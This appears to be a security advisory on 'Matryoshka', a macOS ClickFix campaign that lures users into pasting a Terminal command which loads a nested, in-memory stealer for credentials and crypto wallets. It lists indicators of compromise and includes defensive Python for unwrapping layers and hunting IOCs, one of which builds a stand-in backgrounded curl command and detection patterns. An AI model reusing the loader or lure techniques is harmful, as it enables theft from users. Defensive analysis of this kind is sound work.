Matryoshka Clickfix Variant Targets macOS Users, Deploys New Stealer Malware


A new variant of the “ClickFix” social engineering campaign has been observed specifically targeting macOS users. Codenamed Matryoshka, a reference to its multiple nested obfuscation layers, this evolution builds on prior ClickFix lures.

However, it adds advanced evasion features, including in‑memory decompression and API‑gated communication, that make detection and analysis significantly harder.

Once triggered, the chain loads a stealthy AppleScript payload aimed at stealing browser credentials and compromising crypto wallet applications.

The attack begins when a user visits a deceptive domain such as comparisions[.]org, a misspelling of the legitimate comparisons.org website.

This domain functions as part of a Traffic Distribution System (TDS) that quickly redirects victims to a spoofed support page or fake update portal.

Researchers first observed the campaign in early February 2026, spreading through typosquatting domains and redirect infrastructures designed to trick users into executing a so‑called “Terminal fix command.”

There, victims see a convincing “fix your installation” message instructing them to copy and paste a Terminal command.

This step serves as the social engineering bypass, since entering commands manually can override macOS protection layers that typically prevent unauthorized code execution. In doing so, the victim unwittingly runs a malicious shell script disguised as a legitimate patch.

Technical Analysis: Matryoshka Wrapper

Once executed, the command retrieves a small script commonly referenced as rogue.sh from a remote domain such as barbermoo[.]xyz.

This script contains a large Base64‑encoded and gzip‑compressed payload that unpacks entirely in memory through a pipeline of Base64 decode → gunzip → eval.

This structure, resembling nested Russian dolls, keeps the inner payload invisible to traditional file‑based scanners.

If the command exchange is validated, the C2 server delivers a malicious AppleScript payload (rogue_applescript.scpt), detected by Intego as trojan:AppleScript/Stealer.gen.

After decompression, the inner loader takes over. It employs multiple anti‑analysis behaviors for stealth operation:

  • Background detachment: The loader runs in the background, instantly returning control to the user to avoid suspicion.
  • Output suppression: Input/output redirection hides script activity and errors.
  • API‑gated communication: All network requests require a secret header for valid server responses, hindering traffic emulation by researchers.
  • Argument‑based forwarding: If command‑line arguments are passed, they’re appended to outbound requests to transmit harvested data between stages.
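The following Python script is an added illustration, not code from the report or from the researchers it cites. It statically peels nested "Base64 decode → gunzip → eval" layers of a wrapper like the one described above without ever evaluating them, then flags the anti‑analysis traits listed above (background detachment, output suppression, an API‑key header, eval) in whichever layer they appear. The sample wrapper, its two‑layer depth, the harmless inner commands, the example.invalid URL and the PLACEHOLDER_KEY header value are all constructed for the demo.

```python
import base64
import gzip
import re
import zlib

# Constructed stand-in for the described wrapper: each layer is
# "base64 decode -> gunzip -> eval" around the next one. Two layers deep and
# a harmless inner script are assumptions for the demo, not the real sample.
def _wrap(script: str) -> str:
    blob = base64.b64encode(gzip.compress(script.encode())).decode()
    return f'eval "$(echo {blob} | base64 -d | gunzip)"'

INNER_SCRIPT = (
    'nohup curl -s -H "api-key: PLACEHOLDER_KEY" '
    'https://example.invalid/stage2 >/dev/null 2>&1 &\n'
    'echo harmless-inner-layer\n'
)
SAMPLE_WRAPPER = _wrap(_wrap(INNER_SCRIPT))

# A run of base64 alphabet characters long enough to be a payload blob.
B64_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')

# Traits from the write-up, expressed as static patterns over script text.
SUSPICIOUS = {
    "eval": re.compile(r'\beval\b'),
    "in-memory decompress": re.compile(r'base64\s+(?:-d|--decode)\s*\|\s*(?:gunzip|gzip\s+-d)'),
    "background detach": re.compile(r'\bnohup\b|&\s*$', re.M),
    "output suppression": re.compile(r'>\s*/dev/null|2>&1'),
    "api-gated header": re.compile(r'-H\s*["\']?api-key:', re.I),
    "staging archive": re.compile(r'/tmp/osalogging\.zip'),
    "applescript": re.compile(r'\bosascript\b'),
}


def peel_layers(script: str, max_depth: int = 10) -> list:
    """Unwrap nested base64+gzip blobs statically; nothing is executed."""
    layers = [script]
    current = script
    for _ in range(max_depth):
        inner = None
        for m in B64_RE.finditer(current):
            try:
                raw = base64.b64decode(m.group(0), validate=True)
            except ValueError:          # binascii.Error is a ValueError
                continue
            if raw[:2] != b"\x1f\x8b":  # not a gzip member, keep looking
                continue
            try:
                inner = gzip.decompress(raw).decode("utf-8", "replace")
                break
            except (OSError, EOFError, zlib.error):
                continue
        if inner is None:
            break
        layers.append(inner)
        current = inner
    return layers


def analyze(script: str) -> dict:
    """Return nesting depth, which traits hit in which layer, and the innermost text."""
    layers = peel_layers(script)
    hits = {}
    for depth, layer in enumerate(layers):
        for name, rx in SUSPICIOUS.items():
            if rx.search(layer):
                hits.setdefault(name, []).append(depth)
    return {"depth": len(layers) - 1, "indicators": hits, "inner": layers[-1]}


if __name__ == "__main__":
    report = analyze(SAMPLE_WRAPPER)
    print("nesting depth:", report["depth"])
    for name, where in report["indicators"].items():
        print(f"  {name}: layers {where}")
    print("innermost layer:\n" + report["inner"])
```

Because the unwrapper only decodes and decompresses, it is safe to run over a captured rogue.sh‑style script on an analysis box; the indicator map is the place to add further traits as the campaign changes.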

Mitigations

By decoding and executing content on the fly, Matryoshka avoids writing key components to disk, thereby evading static inspection tools and many sandbox environments.

The script primarily seeks to extract stored passwords and cryptocurrency wallet credentials.

When direct theft fails, the malware triggers a phishing loop, mimicking a macOS “System Preferences” password dialog until the victim enters credentials.

It then targets Ledger Live and Trezor Suite applications: the former by swapping Electron archives inside the bundle for stealth persistence, and the latter by deleting and replacing the entire app with a tainted build.

After data collection, Matryoshka packages stolen information into /tmp/osalogging.zip and uploads it before displaying a deceptive system message to mislead the user into thinking the operation failed harmlessly.

Intego VirusBarrier currently detects the infection chain as:

  • trojan:OSX/Stealer.sh (Zsh/Bash loader).
  • trojan:AppleScript/Stealer.gen (AppleScript payload).

The campaign remains active, and users are strongly advised never to paste code into Terminal under any web instruction.

Genuine macOS fixes, updates, and drivers never require manual command‑line input. Any webpage asking users to do so should be immediately closed.

Indicators of Compromise (IOCs)

  • C2 Domain: barbermoo[.]xyz – Primary command-and-control (C2) infrastructure
  • Typosquatting Domain: comparisions[.]org – Used as initial redirect (typosquat)
  • Gateway URL: macfilesendstream[.]com/r2/ – Traffic distribution and routing point
  • Header: api-key: 5190ef17… – Required for C2 communication (value truncated)
  • File Path: /tmp/osalogging.zip – Staging file for stolen or exfiltrated data
  • SHA-256 (Observed Sample): 62ca9538889b767b1c3b93e76a32fb4469a2486cb3ccb5fb5fa8beb2dd0c2b90
  • SHA-256 (Wrapper Script – rogue.sh): d675bff1b895b1a231c86ace9d7a39d5704e84c4bc015525b2a9c80c39158338
  • SHA-256 (Inner Loader Script): 48770b6493f2b9b9e1d9bdbf482ed981e709bd03e53885ff992121af16f76a09
  • SHA-256 (AppleScript Payload – rogue_applescript.scpt): (Add if available)
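As an added example (not part of the original report), the Python below turns the indicators above into a small hunt: it matches the listed domains (including their subdomains) and the api-key header name against log lines, and checks a directory for the /tmp/osalogging.zip staging file. The log lines are constructed for the demo, the api-key value is only truncated on the page so matching is on the header name alone, and the staging check is run against a scratch directory rather than the real /tmp.

```python
import re
import tempfile
from pathlib import Path

# Indicators from the table above with the "[.]" defanging removed so they
# compare against real log fields.
IOC_DOMAINS = {"barbermoo.xyz", "comparisions.org", "macfilesendstream.com"}
IOC_HEADER_NAME = "api-key"        # value is truncated on the page; match the name only
STAGING_FILE = "osalogging.zip"    # found under /tmp on an infected host

# Constructed sample lines: one DNS query record and three proxy entries.
SAMPLE_LOG_LINES = [
    "2026-02-03T10:01:02Z dns query A comparisions.org from 10.0.0.7",
    "2026-02-03T10:01:05Z proxy 10.0.0.7 GET https://macfilesendstream.com/r2/ 302",
    "2026-02-03T10:01:09Z proxy 10.0.0.7 GET https://www.apple.com/support 200",
    "2026-02-03T10:01:20Z proxy 10.0.0.7 GET https://barbermoo.xyz/rogue.sh 200 hdr=api-key",
]

# Anything that looks like a hostname: labels separated by dots, alphabetic TLD.
DOMAIN_TOKEN_RE = re.compile(r'\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b', re.I)


def matches_ioc_domain(host: str) -> str:
    """Return the matching IOC domain for host (exact or subdomain), else ''."""
    host = host.lower()
    for ioc in IOC_DOMAINS:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return ""


def ioc_hits(lines) -> list:
    """List (line_index, indicator) pairs for every IOC seen in the lines."""
    hits = set()
    for i, line in enumerate(lines):
        for token in DOMAIN_TOKEN_RE.findall(line):
            ioc = matches_ioc_domain(token)
            if ioc:
                hits.add((i, ioc))
        if IOC_HEADER_NAME in line.lower():
            hits.add((i, "header:" + IOC_HEADER_NAME))
    return sorted(hits)


def check_staging_file(tmp_dir: str) -> bool:
    """True if the staging archive named in the IOC table exists in tmp_dir."""
    return (Path(tmp_dir) / STAGING_FILE).exists()


def demo_staging_check():
    """Exercise the staging-file check against a scratch directory, not /tmp."""
    with tempfile.TemporaryDirectory() as scratch:
        before = check_staging_file(scratch)
        (Path(scratch) / STAGING_FILE).write_bytes(b"")  # constructed marker
        after = check_staging_file(scratch)
    return before, after


if __name__ == "__main__":
    for idx, indicator in ioc_hits(SAMPLE_LOG_LINES):
        print(f"line {idx}: {indicator}")
    print("staging file check (before, after):", demo_staging_check())
    print("real /tmp:", check_staging_file("/tmp"))
```

On a live macOS host the last line is the useful one; on a log platform, feed ioc_hits the proxy or DNS export and pivot on the source addresses it returns.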
